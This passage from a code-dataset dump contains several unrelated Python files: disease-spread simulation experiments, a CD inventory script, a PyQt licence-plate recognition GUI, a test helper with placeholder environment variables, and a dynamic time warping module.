1])[:], color, label=i)\n elif i == 'Wichita':\n color = 'orange'\n cwtmatr = signal.cwt(avg_I_data.loc[i], SIGNAL, [1])\n ax[2].plot(time_tracker[:], abs(cwtmatr[WIDTH - 1])[:], color, label=i)\n else:\n pass\n\n ax[2].set_title(\"Morlet Wavelet Transform of Width 1 For All Cities\")\n ax[2].set_ylabel(\"Incidence with Morlet\")\n ax[2].set_xlabel(\"Time in Days\")\n plt.legend(loc='upper right')\n plt.show()\n\n return (a, b, c, d, city_vals['Distances'], avg_I_data.idxmax(axis=1), avg_I_data.max(axis=1))\n\ndef test_i_over_time_wavelets(trials=10, v=VarGetter()):\n avg_I_data, time_tracker = get_avg_data(trials, v)\n widths = np.arange(1, 31)\n # ['daub', 'qmf', 'cascade', 'morlet', 'ricker', 'cwt']\n\n WIDTH = 1\n SIGNAL = signal.morlet2\n\n # _, ax = plt.subplots(1, 3)\n for i in avg_I_data.index:\n color = 'lightgray'\n cwtmatr = signal.cwt(avg_I_data.loc[i], SIGNAL, widths)\n # ax[2].plot(time_tracker, abs(cwtmatr[WIDTH - 1]), color)\n plt.plot(time_tracker, abs(cwtmatr[WIDTH - 1]), color)\n\n for i in avg_I_data.index:\n if i == 'Fargo':\n color = 'r'\n cwtmatr = signal.cwt(avg_I_data.loc[i], SIGNAL, widths)\n # ax[2].plot(time_tracker, abs(cwtmatr[WIDTH - 1]), color)\n plt.plot(time_tracker, abs(cwtmatr[WIDTH - 1]), color, label='Fargo')\n elif i == 'Columbus':\n color = 'g'\n cwtmatr = signal.cwt(avg_I_data.loc[i], SIGNAL, widths)\n # ax[2].plot(time_tracker, abs(cwtmatr[WIDTH - 1]), color)\n plt.plot(time_tracker, abs(cwtmatr[WIDTH - 1]), color, label='Columbus')\n elif i == 'Chicago':\n color = 'b'\n cwtmatr = signal.cwt(avg_I_data.loc[i], SIGNAL, widths)\n # ax[2].plot(time_tracker, abs(cwtmatr[WIDTH - 1]), color)\n plt.plot(time_tracker, abs(cwtmatr[WIDTH - 1]), color, label='Chicago')\n else:\n pass\n\n # cwtmatr = signal.cwt(avg_I_data.iloc[0], SIGNAL, widths)\n # for width in cwtmatr[1:]:\n # ax[1].plot(time_tracker, width)\n\n # ax[1].plot(SIGNAL(M=100, s=WIDTH))\n\n # ax[1].plot(time_tracker, cwtmatr[-1])\n # sns.heatmap(np.flipud(abs(cwtmatr)), ax=ax[0], xticklabels=int(len(time_tracker)/15))\n # sns.heatmap(fft.dct(avg_I_data.values)[:,:20], ax=ax[2], xticklabels=int(len(time_tracker)/15))\n # sns.heatmap(avg_I_data, ax=ax[1], xticklabels=int(len(time_tracker)/15))\n # ax[2].set_title(f\"All wavelet transforms of width {WIDTH}\")\n plt.title(f\"Wavelet Transform of Infected Individuals With .75 Spike\")\n plt.ylabel(\"Incidence with Morlet\")\n plt.xlabel(\"Time in Days\")\n plt.legend()\n # ax[1].set_title(f\"Infected Population Over Time For {avg_I_data.index[0]}\")\n # ax[2].set_title(f\"Visualization of Morlet2 for width {WIDTH}\")\n # txt=f\"Percent of population infected over time with y axis arranged by distance from {v.get_start_nodes()[0]}. The time period is {v.get_time_vars()['total_time']} days. The travel model used is {v.get_travel_vars()['connection_type']}.\"\n # plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=12)\n plt.show()\n\ndef test_total_i_over_time(trials=10):\n avg_populations = pd.DataFrame([])\n for i in tqdm(range(trials), desc=\"Trials\"):\n net = DiseaseNetwork(get_cities(), get_distances(), SEIRSNode, get_dvars(), get_time_vars(), get_travel_vars())\n tracker, _, time_tracker, _ = net.simulate()\n populations = pd.DataFrame(tracker[list(tracker)[0]])\n for city in list(tracker)[1:]:\n populations += pd.DataFrame(tracker[city])\n\n if avg_populations.empty:\n avg_populations = populations \n else:\n avg_populations += populations\n\n S = plt.plot(time_tracker, avg_populations.iloc[:,0], 'r')\n E = plt.plot(time_tracker, avg_populations.iloc[:,1], 'y')\n I = plt.plot(time_tracker, avg_populations.iloc[:,2], 'b')\n R = plt.plot(time_tracker, avg_populations.iloc[:,3], 'g')\n cS = plt.plot(time_tracker, avg_populations.iloc[:,4], 'g--')\n plt.xlabel('Time')\n plt.ylabel('Disease Populations')\n plt.title('Total Populations over Time Starting in Joliet')\n plt.legend(['S Population', 'E Population', 'I Population', 'R Population', 'Total Population'], loc='upper right')\n \n plt.show()\n\ndef test_i_over_time(trials=10):\n v = VarGetter()\n avg_I_data = pd.DataFrame([])\n infected_times = defaultdict(lambda: 0)\n for i in tqdm(range(trials), desc=\"Trials\"):\n net = DiseaseNetwork(v.get_cities(), v.get_distances(), SEIRSNode, v.get_dvars(), v.get_time_vars(), v.get_travel_vars())\n tracker, _, time_tracker, _ = net.simulate()\n\n distance_from_start_order = np.array(v.get_distances()[np.where(np.array(v.get_cities())[:,0] == v.get_start_nodes()[0])[0][0]]).argsort()\n city_list = np.array(list(tracker))[distance_from_start_order]\n I_populations = np.array([[i[2] / i[4] for i in np.array(city_stats)] for city_stats in tracker.values()])[distance_from_start_order]\n\n def logplusone(a):\n return np.log10(a+1)\n # .apply(logplusone)\n data = pd.DataFrame(I_populations, columns=time_tracker, index=city_list)\n\n if avg_I_data.empty:\n avg_I_data = data \n else:\n avg_I_data += data \n\n for city in data.index:\n start = 0\n end = 0\n for time, percent_pop in data.loc[city].iteritems():\n if start == 0 and percent_pop > .01:\n start = time \n \n if start > 0 and percent_pop < .01:\n end = time \n break \n \n if end == 0:\n end = 200\n\n infected_times[city] += end - start \n\n infected_times = dict((city, total_times / trials) for city, total_times in infected_times.items())\n avg_I_data = avg_I_data.div(trials)\n _, ax = plt.subplots(1, 3)\n sns.heatmap(avg_I_data, ax=ax[0], xticklabels=int(len(time_tracker)/15))\n ax[0].set_title(\"Infected Population Over Time\")\n txt=f\"Percent of population infected over time with y axis arranged by distance from {v.get_start_nodes()[0]}. The time period is {v.get_time_vars()['total_time']} days. The travel model used is {v.get_travel_vars()['connection_type']}.\"\n for i in avg_I_data.index:\n color = \"green\" if i == 'Columbus' else \"blue\" if i == 'Chicago' else \"red\" if i == 'Fargo' else \"orange\" if i == 'Wichita' else \"lightgrey\"\n ax[2].plot(time_tracker, avg_I_data.loc[i], color=color)\n plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=12)\n sns.barplot(x=list(infected_times.keys()), y=list(infected_times.values()), ax=ax[1])\n plt.setp(ax[1].get_xticklabels(), rotation=30, horizontalalignment='right', fontsize='x-small')\n plt.show()\n\ndef test_network(trials=10): \n v = VarGetter()\n\n net = DiseaseNetwork(v.get_cities(), v.get_distances(), SEIRSNode, v.get_dvars(), v.get_time_vars(), v.get_travel_vars())\n\n tracker, _, time_tracker, _ = net.simulate()\n cities = ['Chicago', 'Milwaukee', 'Rockford', 'Gary', 'St. Louis', 'Columbus', 'Independence', 'Olathe']\n\n for city, number in zip(cities, range(1, len(cities) + 1)):\n populations = np.array(tracker[city])\n plt.subplot(1,len(cities),number)\n _ = plt.plot(time_tracker, populations[:,0], 'r')\n _ = plt.plot(time_tracker, populations[:,1], 'y')\n _ = plt.plot(time_tracker, populations[:,2], 'b')\n _ = plt.plot(time_tracker, populations[:,3], 'g')\n _ = plt.plot(time_tracker, populations[:,4], 'g--')\n plt.xlabel('Time')\n plt.ylabel('Disease Populations')\n plt.title(city)\n plt.legend(['S Population', 'E Population', 'I Population', 'R Population', 'Total Population'], loc='upper right')\n \n plt.show()\n\ndef test_four_nodes(trials = 10):\n v = VarGetter()\n\n net = DiseaseNetwork(v.get_cities_small(), v.get_distances_small(), SEIRSNode, v.get_dvars(), v.get_time_vars(), v.get_travel_vars())\n\n tracker, _, time_tracker, _ = net.simulate()\n cities = np.array(v.get_cities_small())[:, 0]\n\n for city, number in zip(cities, range(1, len(cities) + 1)):\n populations = np.array(tracker[city])\n plt.subplot(1,len(cities),number)\n _ = plt.plot(time_tracker, populations[:,0], 'r')\n _ = plt.plot(time_tracker, populations[:,1], 'y')\n _ = plt.plot(time_tracker, populations[:,2], 'b')\n _ = plt.plot(time_tracker, populations[:,3], 'g')\n _ = plt.plot(time_tracker, populations[:,4], 'g--')\n plt.xlabel('Time')\n plt.ylabel('Disease Populations')\n plt.title(city)\n plt.legend(['S Population', 'E Population', 'I Population', 'R Population', 'Total Population'], loc='upper right')\n \n plt.show()\n\ndef test_single_node(trials = 100):\n v = VarGetter()\n delta_t = v.get_time_vars()['time_step']\n total_t = v.get_time_vars()['total_time']\n de_node = SEIRSDENode(2500000, v.get_dvars(), delta_t = delta_t, name = 'Chicago', start_with_disease=True)\n \n curr_time = 0\n time_tracker = []\n de_tracker = []\n\n for _ in tqdm(range(int(total_t / delta_t)), desc=\"Simulation\"):\n curr_time += delta_t\n de_node.increment()\n de_tracker.append(de_node.get_state())\n time_tracker.append(curr_time)\n\n st_tracker = np.array([])\n for _ in tqdm(range(trials), desc=\"Trial\"):\n st_node = SEIRSNode(2500000, v.get_dvars(), delta_t = delta_t, name = 'Chicago', start_with_disease=True)\n temp = []\n for _ in tqdm(range(int(total_t / delta_t)), desc=\"Simulation\"):\n st_node.increment()\n temp.append(st_node.get_state())\n\n temp = np.array(temp)\n\n if len(st_tracker) > 0:\n st_tracker += temp \n else:\n st_tracker = temp\n \n st_tracker = st_tracker / trials\n _, ax = plt.subplots(1, 2)\n st_tracker = np.array(st_tracker)\n ax[0].plot(time_tracker, st_tracker[:,0], 'r', label='S')\n ax[0].plot(time_tracker, st_tracker[:,1], 'y', label='E')\n ax[0].plot(time_tracker, st_tracker[:,2], 'b', label='I')\n ax[0].plot(time_tracker, st_tracker[:,3], 'g', label='R')\n ax[0].plot(time_tracker, st_tracker[:,4], 'g--')\n ax[0].set_xlabel('Time (Days)')\n ax[0].set_ylabel('Populations')\n ax[0].set_title('Population Makeup In Chicago Stochastic')\n\n de_tracker = np.array(de_tracker)\n ax[1].plot(time_tracker, de_tracker[:,0], 'r', label='S')\n ax[1].plot(time_tracker, de_tracker[:,1], 'y', label='E')\n ax[1].plot(time_tracker, de_tracker[:,2], 'b', label='I')\n ax[1].plot(time_tracker, de_tracker[:,3], 'g', label='R')\n ax[1].plot(time_tracker, de_tracker[:,4], 'g--')\n ax[1].set_xlabel('Time (Days)')\n ax[1].set_ylabel('Populations')\n ax[1].set_title('Population Makeup In Chicago Deterministic') \n\n ax[0].legend(loc='upper right')\n ax[1].legend(loc='upper right')\n plt.show()\n\n\"\"\"\nThink about questions to ask\nRead two travel papers\nThink about how to graph data so that my question is answered (peak(I), cumulative(I))\nStart tracking cumulative I (total number of people infected, new ones at each step)\nparameter that is varying, propbability of extinction (of disease)\ncumulative death\n\nTime to spikes or inbetween spikes\nThink about the ocsillations\nMax oscillation, min oscillation, time inbetween\n\nDistance from Chicago vs max_I, total_I\n\nThink about asymptotic behavior of the model, can we change it (super powerful)\n\nPlay around to see rough observations, start making some observations, how can we compare things\n- Three indicator cities\n- Travel ban cities\n- What else can we change in the model\n - Types of travel\n - Quarantine\n - Thresholding\n - Immunity loss\n - Testing Variables\n\nthink about how to quantify quarantine vs travel ban, surface plot of travel ban vs quarantine days\nthink about how the sin_beta function works, how does first case occurrence affect spread\n\nmake note of what simulations are most interesting\n\nupdate stochastic equations to discrete form, say S_{t + 1} - S_t\nintroduce why disease modelling is important\nintroduce graph setup, say where everything comes from, why decisions are made\n- this is just an example of how the model can be used, can be extracted to other nodes\n\nconfirm radiation is working\n\nmaybe:\n- try modelling nodes with different travel variables, different quarantine bans\n- random number that can be associated with compliance for each city\n- subtract random number of days from the quarantine, also for threshold\n\nrun the diff betas in chicago with a spike value, longer t final\n\"\"\"\n","repo_name":"NathanHu725/thesis","sub_path":"experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":25274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11029011739","text":"#------------------------------------------#\r\n# Title: CDInventory.py\r\n# Desc: Starter Script for Assignment 05\r\n# Change Log: (Who, When, What)\r\n# DBiesinger, 2030-Jan-01, Created File\r\n# MList, 2020-Feb-23, Modified File by replacing inner lists with dictiionaries\r\n# MList, 2020-Feb-24 Added delete functionality\r\n# Mlist, 2020-Feb-24 Made file loading mandatory to prevent duplicates\r\n# Mlist, 2020-Feb-24 Added error message in case deleted CD does not exist\r\n# Mlist, 2020-Feb-24 Cleaning up code and adding comments\r\n# Mlist, 2020-Feb-24 Improving SoC\r\n#------------------------------------------#\r\n\r\n#---------- DATA ----------#\r\n\r\n# Declare variabls\r\nstrChoice = '' # User input\r\nlstTbl = [] # list of dictionaries to hold data\r\nlstRow = [] # Row list variable for storing text file infomration while reading\r\ndicRow = {} # dictionary of data row\r\nstrFileName = 'CDInventory.txt' # data storage file\r\nobjFile = None # file object\r\nFlag = True # flag to identify no found match for delete functionality\r\n\r\n#---------- PROCESSING ----------#\r\n\r\n# Attempting to load current iventory upon startup. Loading inventory from existing CDInventory.txt file has been made non-optional to avoid writing duplicates when deleting/saving edits with append\r\ntry:\r\n with open(strFileName, 'r') as objFile:\r\n for line in objFile:\r\n lstRow = line.strip().split(',')\r\n dicRow = {'ID': int(lstRow[0]), 'CD Title': lstRow[1], 'Artist': lstRow[2]}\r\n lstTbl.append(dicRow)\r\n print('\\nGood news! There is already a CDinventory.txt file. \\nThe existing file has been loaded and any saved changes will overrite the existing file.')\r\nexcept IOError: \r\n print('\\nThere is currently no existing inventory file - A new Inventory File will be creating when saving.\\n')\r\n\r\n#---------- PRESENTATION (Input/Output) (I/O) ----------#\r\n\r\nprint('\\nThe Magic CD Inventory\\n')\r\nwhile True:\r\n # 1. Display menu allowing the user to choose:\r\n print('\\n[a] Add CD\\n[i] Display Current Inventory')\r\n print('[d] delete CD from Inventory\\n[s] Save Inventory to file\\n[x] exit')\r\n strChoice = input('a, i, d, s or x: ').lower() # convert choice to lower case at time of input\r\n print()\r\n\r\n# Exit the program if the user chooses so\r\n if strChoice == 'x':\r\n break\r\n\r\n# Add data to the table (2d-list) each time the user wants to add data\r\n elif strChoice == 'a': # no elif necessary, as this code is only reached if strChoice is not 'exit'\r\n # Ask for CD input\r\n strID = input('Enter an ID: ')\r\n strTitle = input('Enter the CD\\'s Title: ')\r\n strArtist = input('Enter the Artist\\'s Name: ')\r\n intID = int(strID)\r\n # casting input into dictionary\r\n dicRow = {'ID': intID, 'CD Title': strTitle, 'Artist': strArtist}\r\n lstTbl.append(dicRow)\r\n # Display the current data to the user each time the user wants to display the data\r\n elif strChoice == 'i':\r\n print('ID, CD Title, Artist')\r\n for row_dic in lstTbl:\r\n row_dic_values = row_dic.values()\r\n print(*row_dic_values, sep = ', ')\r\n\r\n # Delete functionality\r\n elif strChoice == 'd':\r\n # Ask for entry to delete. This will need to the value of the album because artist is not a unique identifier and their could be potential duplicate IDs.\r\n CD = input('Which CD would you like to delete?: ')\r\n # Counter starting at 0 for cycling through the individual dictionaries. Need to reset counter to 0 in case user alread used delete functionality\r\n counter = 0\r\n # Defining a flag as false in case no match will be identified to print an error message\r\n Flag = False\r\n # For each dictionary row in the 2D list\r\n for row in lstTbl:\r\n # Assinging values of dictionary row to a variable\r\n row_values = row.values()\r\n # Checking if input matches any values of dictionary row\r\n if CD in row_values:\r\n # If match has been indentified use counter variable as index location for delete function in the 2D list\r\n del lstTbl[counter]\r\n print ('The requested CD has been deleted. Do not forget to save your changes!')\r\n # Setting Flag to true so error message does not get printed\r\n Flag = True\r\n break\r\n else:\r\n # If the input does not match the values of the dictionary row increase the counter by 1 and move to the next dictionary row in the 2D list\r\n counter += 1\r\n # If no match has been found and deleted the flag will still be False and an error message will be printed\r\n if Flag is False:\r\n print ('The requested CD does not exist in the inventory txt file')\r\n\r\n # Save the data to a text file CDInventory.txt if the user chooses so\r\n elif strChoice == 's':\r\n write_string = ''\r\n for row_dic in lstTbl:\r\n row_dic_values = row_dic.values()\r\n for item in row_dic_values:\r\n write_string += str(item) + ','\r\n write_string = write_string [:-1] + '\\n'\r\n objFile = open(strFileName, 'w')\r\n objFile.write(write_string)\r\n objFile.close()\r\n else:\r\n print('Please choose either a, i, d, s or x!')\r\n\r\n","repo_name":"List-Michael/Assignment_05","sub_path":"CDInventory.py","file_name":"CDInventory.py","file_ext":"py","file_size_in_byte":5354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27315059751","text":"# -*- coding: utf-8 -*-\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtWidgets import QMainWindow,QSplashScreen\nfrom Ui_MainWindow import Ui_MainWindow\nfrom PyQt5 import QtWidgets,QtCore\nfrom Ui_ImageWindow import Ui_Dialog\nfrom PyQt5.QtWidgets import QDialog\nfrom PyQt5.QtWidgets import QFileDialog, QTableWidgetItem ,QMessageBox\nfrom PyQt5.QtGui import QPixmap\nfrom plate import recognize_and_show_one_image\nfrom plate_video import video\nimport os\nfrom Ui_VideoWindow import Ui_Dialog2\n\nclass VideoWindow(QDialog, Ui_Dialog2):\n\n def __init__(self, parent=None):\n super(VideoWindow, self).__init__(parent)\n self.setupUi(self)\n\n @pyqtSlot()\n def on_pushButton_clicked(self):\n\n print('选择文件')\n fileName1, filetype = QFileDialog.getOpenFileName(self, \"选取文件\", \"C:/\",\n \"Text Flies(*.mp4);;Text Files (*.avi);;Text Files (*.mov)\"\n \";;Text Files (*.mpeg)\")\n self.lineEdit.setText(fileName1)\n\n @pyqtSlot()\n def on_pushButton_2_clicked(self):\n path = self.lineEdit.text()\n if path == \"\" or path == \" \":\n QMessageBox.warning(self,'Warning','请选择文件!')\n else:\n # print(path)\n self.textBrowser.setText(\"\")\n self.textBrowser.append(\"正在处理,请稍候........\")\n file_name = video(path)\n self.textBrowser.append(\"处理完成!文件保存为:%s\"%(file_name))\n\nclass Image(QDialog, Ui_Dialog):\n\n def __init__(self, parent=None):\n\n super(Image, self).__init__(parent)\n self.setupUi(self)\n self.radio_flag =0\n self.pic = 1\n self.flag = 0\n self.path = ''\n @pyqtSlot()\n def on_radioButton_clicked(self):\n\n self.radio_flag = 0\n self.lineEdit.setText(\"\")\n \n @pyqtSlot()\n def on_radioButton_2_clicked(self):\n \"\"\"\n Slot documentation goes here\n \"\"\"\n self.radio_flag = 1\n self.lineEdit.setText(\"\")\n\n @pyqtSlot()\n def on_pushButton_clicked(self):\n \"\"\"\n Slot documentation goes here.\n \"\"\"\n # print(self.radio_flag)\n if self.radio_flag ==1:\n directory1 = QFileDialog.getExistingDirectory(self, \"选取文件夹\", \"C:/\")\n self.lineEdit.setText(directory1)\n else:\n #设置文件扩展名过滤,注意用双分号间隔 \n fileName1, filetype = QFileDialog.getOpenFileName(self, \"选取文件\", \"C:/\", \"Text Flies(*.jpg);;Text Files (*.png);;Text Files (*.jpeg)\")\n self.lineEdit.setText(fileName1)\n \n @pyqtSlot()\n def on_pushButton_2_clicked(self):\n\n self.flag = 1\n print('识别开始!')\n path = self.lineEdit.text()\n if path is not \"\":\n if self.radio_flag == 0:\n res_set = recognize_and_show_one_image(path,0)\n if len(res_set) > 0:\n filename = path.rsplit('/',1)[-1]\n self.tableWidget.setRowCount(len(res_set))\n for row in range(len(res_set)):\n self.tableWidget.setItem(row, 0, QTableWidgetItem(str(filename)))\n self.tableWidget.setItem(row, 1, QTableWidgetItem(res_set[row][2]))\n self.tableWidget.setItem(row, 2, QTableWidgetItem(res_set[row][1]))\n self.tableWidget.setItem(row, 3, QTableWidgetItem(str(res_set[row][3])))\n path = path.replace('/', '\\\\')\n # print(path)\n dir = path.rsplit('\\\\', 1)[0] + '\\\\temp'\n self.path = dir\n # print(self.path)\n pixmap = QPixmap(self.path+'\\\\'+'0.jpg')\n self.label_2.setPixmap(pixmap)\n else:\n QMessageBox.about(self,'提示','没有发现车牌!')\n else:\n\n files = os.listdir(path)\n filenames = [file for file in files if file.endswith('.jpg')\n or file.endswith('.png') or file.endswith('.jepg')]\n res_list = []\n flag = 1\n path = path.replace('/', '\\\\')\n dir = path + '\\\\' +'temp'\n self.path = dir\n for filename in filenames:\n file_dir = os.path.join(path, filename)\n\n # # 创建新线程\n # thread1 = myThread(file_dir)\n # # 开启线程\n # thread1.start()\n #\n # while not q.empty():\n # print(q.get())\n res_set = recognize_and_show_one_image(file_dir,flag)\n if len(res_set) > 0:\n flag +=1\n if len(res_set) > 1:\n for res in res_set:\n res_list.append(res)\n elif len(res_set) == 1:\n res_list.append(res_set[0])\n else:\n res_set.append(res_set)\n self.tableWidget.setRowCount(len(res_list))\n for row in range(len(res_list)):\n if len(res_list) > 0:\n self.tableWidget.setItem(row, 0, QTableWidgetItem(res_list[row][4]))\n self.tableWidget.setItem(row, 1, QTableWidgetItem(res_list[row][2]))\n self.tableWidget.setItem(row, 2, QTableWidgetItem(res_list[row][1]))\n self.tableWidget.setItem(row, 3, QTableWidgetItem(str(res_list[row][3])))\n\n QMessageBox.about(self,'Finshed!','批处理完成!')\n pixmap = QPixmap(self.path + '\\\\' + '1.jpg')\n self.label_2.setPixmap(pixmap)\n else:\n QMessageBox.warning(self,'警告!','文件不能为空!')\n\n @pyqtSlot()\n def on_pushButton_3_clicked(self):\n if self.flag ==1:\n self.pic +=1\n path = self.path+'\\\\'+str(self.pic)+'.jpg'\n if os.path.exists(path):\n pixmap = QPixmap(path)\n self.label_2.setPixmap(pixmap)\n else:\n QMessageBox.warning(self,'Warning','这是最后一页了!')\n else:\n QMessageBox.warning(self,'Warning','请先识别!')\n\n @pyqtSlot()\n def on_pushButton_4_clicked(self):\n if self.flag ==1:\n self.pic -= 1\n path = self.path+'\\\\' + str(self.pic) + '.jpg'\n if self.pic!=0 and os.path.exists(path):\n pixmap = QPixmap(path)\n self.label_2.setPixmap(pixmap)\n else:\n QMessageBox.warning(self, 'Warning', '这是第一页页了!')\n else:\n QMessageBox.warning(self,'Warning','请先识别!')\n\nclass MainWindow(QMainWindow, Ui_MainWindow):\n\n def __init__(self, parent=None):\n\n super(MainWindow, self).__init__(parent)\n self.setupUi(self)\n \n @pyqtSlot()\n def on_pushButton_2_clicked(self):\n\n ui_image = Image()\n ui_image.showMaximized()\n ui_image.exec_()\n \n @pyqtSlot()\n def on_pushButton_3_clicked(self):\n\n print(u'视频处理!')\n ui_video = VideoWindow()\n ui_video.exec_()\n \n @pyqtSlot()\n def on_pushButton_clicked(self):\n\n print(u'摄像头处理!')\n \nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n splash =QSplashScreen(QPixmap(\":/my_pics/slide3.jpg\"))\n splash.showMessage(u\"加载... 0%\", QtCore.Qt.AlignHCenter | QtCore.Qt.AlignBottom, QtCore.Qt.black)\n splash.show()\n QtWidgets.qApp.processEvents()\n ui = MainWindow()\n ui.show()\n splash.finish(ui)\n sys.exit(app.exec_())\n","repo_name":"xingzhoupy/Plate_LPR","sub_path":"MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":7867,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"39719938261","text":"import os\n\n\nclass TestHelpers:\n ENV_VARS = {\n 'POSTGRES_HOST': 'test_psql_host',\n 'POSTGRES_PORT': 'test_psql_port',\n 'POSTGRES_USER': 'test_psql_user',\n 'POSTGRES_PSWD': 'test_psql_pswd',\n 'POSTGRES_NAME': 'test_psql_name',\n 'POSTGRES_ADMIN_USER': 'test_psql_admin',\n 'POSTGRES_ADMIN_PSWD': 'test_psql_admin_pswd',\n 'REDIS_HOST': 'test_redis_host',\n 'REDIS_PORT': 'test_redis_port',\n 'ELASTICSEARCH_INDEX': 'test_es_index',\n 'ELASTICSEARCH_HOST': 'test_es_host',\n 'ELASTICSEARCH_PORT': 'test_es_port',\n 'ELASTICSEARCH_TIMEOUT': 'test_es_timeout',\n 'RABBIT_HOST': 'test_rbmq_host',\n 'RABBIT_PORT': 'test_rbmq_port',\n 'RABBIT_VIRTUAL_HOST': 'test_rbmq_vhost',\n 'RABBIT_EXCHANGE': 'test_exchange',\n 'RABBIT_USER': 'test_rbmq_user',\n 'RABBIT_PSWD': 'test_rbmq_pswd',\n 'OCLC_ROUTING_KEY': 'test_oclc_key',\n 'OCLC_QUEUE': 'test_oclc_queue',\n 'FILE_ROUTING_KEY': 'test_file_key',\n 'FILE_QUEUE': 'test_file_queue',\n 'HATHI_DATAFILES': 'test_hathi_url',\n 'OCLC_API_KEY': 'test_oclc_key',\n 'OCLC_CLASSIFY_API_KEY': 'test_classify_key',\n 'AWS_ACCESS': 'test_aws_key',\n 'AWS_SECRET': 'test_aws_secret',\n 'AWS_REGION': 'test_aws_region',\n 'FILE_BUCKET': 'test_aws_bucket',\n 'NYPL_BIB_HOST': 'test_bib_host',\n 'NYPL_BIB_PORT': 'test_bib_port',\n 'NYPL_BIB_NAME': 'test_bib_name',\n 'NYPL_BIB_USER': 'test_bib_user',\n 'NYPL_BIB_PSWD': 'test_bib_pswd',\n 'NYPL_LOCATIONS_BY_CODE': 'test_location_url',\n 'NYPL_API_CLIENT_ID': 'test_api_client',\n 'NYPL_API_CLIENT_SECRET': 'test_api_secret',\n 'NYPL_API_CLIENT_TOKEN_URL': 'test_api_token_url',\n 'GITHUB_API_KEY': 'test_github_key',\n 'GITHUB_API_ROOT': 'test_github_url',\n 'BARDO_CCE_API': 'test_cce_url',\n 'MUSE_MARC_URL': 'test_muse_url',\n 'MUSE_CSV_URL': 'test_muse_csv',\n 'DOAB_OAI_URL': 'test_doab_url',\n 'SMARTSHEET_API_TOKEN': 'test_smartsheet_token',\n 'SMARTSHEET_SHEET_ID': '1000',\n 'WEBPUB_CONVERSION_URL': 'test_conversion_url',\n 'WEBPUB_PDF_PROFILE': 'test_profile_uri'\n }\n\n @classmethod\n def setEnvVars(cls):\n for key, value in cls.ENV_VARS.items():\n os.environ[key] = value\n\n @classmethod\n def clearEnvVars(cls):\n for key in cls.ENV_VARS.keys():\n os.environ[key] = ''\n","repo_name":"NYPL/drb-etl-pipeline","sub_path":"tests/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"hi","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"13273526055","text":"from point2d import Point2D\nimport math\n\ndef distance(a1, a2):\n \"\"\" Finds the normal unmodified version of the dynamic time warping algorithm\n between two time series arrays \"\"\"\n n = len(a1)\n m = len(a2)\n\n # Create a nxm sized matrix where all values are initialized to infinity\n DTW = [ [float(\"inf\")] * m for i in range(n) ]\n DTW[0][0] = 0\n\n for i in range(n):\n for j in range(m):\n cost = __dist__(a1[i], a2[j])\n prev_i = i-1 if i>0 else 0 # If on the edges of the matrix do not\n prev_j = j-1 if j>0 else 0 # use negative indices\n min_previous = min( DTW[prev_i][ j],\n DTW[ i][ prev_j],\n DTW[prev_i][ prev_j])\n DTW[i][j] = cost + min_previous\n return DTW[n-1][m-1]\n\ndef time_percentage(a1, time1, a2, time2):\n \"\"\" Finds the modified version of the dynamic time warping algorithm\n between two time series arrays and their given times. The two paths do not\n need to be of the same length or have the same timing signatures however this\n function has an O(nm) time complexity.\"\"\"\n n = len(a1)\n m = len(a2)\n\n # Create a nxm sized matrix where all values are initialized to infinity\n DTW = [ [float(\"inf\")] * m for i in range(n) ]\n DTW[0][0] = 0\n\n # Max distance is the largest penalty the combined cost can have\n MAX_DISTANCE = 5 # this value could be substituted with beta radius\n # Max aggregate distance is the worst possible combined cost\n MAX_AGGREGATE_DISTANCE = MAX_DISTANCE * n\n\n for i in range(n):\n for j in range(m):\n dist_cost = __dist__(a1[i], a2[j])\n time_cost = __time_cost__( max(time1[i], time2[j]) )\n total_cost = dist_cost + time_cost\n total_cost = MAX_DISTANCE if total_cost > MAX_DISTANCE else total_cost\n\n prev_i = i-1 if i>0 else 0 # If on the edges of the matrix do not\n prev_j = j-1 if j>0 else 0 # use negative indices\n min_previous = min( DTW[prev_i][ j],\n DTW[ i][ prev_j],\n DTW[prev_i][ prev_j])\n\n DTW[i][j] = total_cost + min_previous\n return 1 - (DTW[n-1][m-1]/MAX_AGGREGATE_DISTANCE ) # Return a percentage of simularity\n\ndef basic_function(a1, a2, time):\n \"\"\" This basic function is not a DTW function but performs a basic comparison\n of two identically sized time series paths. An interpolation technique could\n be used to get the exact same number of samples at the same time if this method\n is used. Complexity is O(n) \"\"\"\n n = len(time)\n MAX_DISTANCE = 5 # this value could be substituted with beta radius\n MAX_AGGREGATE_DISTANCE = MAX_DISTANCE * n\n aggregate_cost = 0\n for i in range(n):\n dist_cost = __dist__(a1[i], a2[i])\n time_cost = __time_cost__(time[i])\n total_cost = dist_cost + time_cost\n aggregate_cost += MAX_DISTANCE if total_cost > MAX_DISTANCE else total_cost\n return 1 - (aggregate_cost / MAX_AGGREGATE_DISTANCE)\n\ndef __dist__(point1, point2):\n \"\"\" Distance function currently being used for the distance calculations \"\"\"\n # Use the Point2D to find the abs(point1-point2)\n return (point1 - point2).r\n\ndef __time_cost__( time ):\n \"\"\" Time cost function currently being used for distance calculations \"\"\"\n time_cost = math.log(time/10)+1 # A suitable function should be found\n return time_cost if time_cost > 0 else 0\n\nif __name__ == \"__main__\":\n print(\"Quick test in progress\")\n a1 = [Point2D(0,0), Point2D(0,1), Point2D(0,2), Point2D(0,3)]\n a2 = [Point2D(1,0), Point2D(2,0), Point2D(3,0), Point2D(4,0)]\n print(distance(a1, a2))\n print(distance(a1, a1))\n","repo_name":"heterdaft/Dynamic-Time-Warping-with-Modifications","sub_path":"dtw.py","file_name":"dtw.py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36650503155","text":"from django.urls import path\nfrom 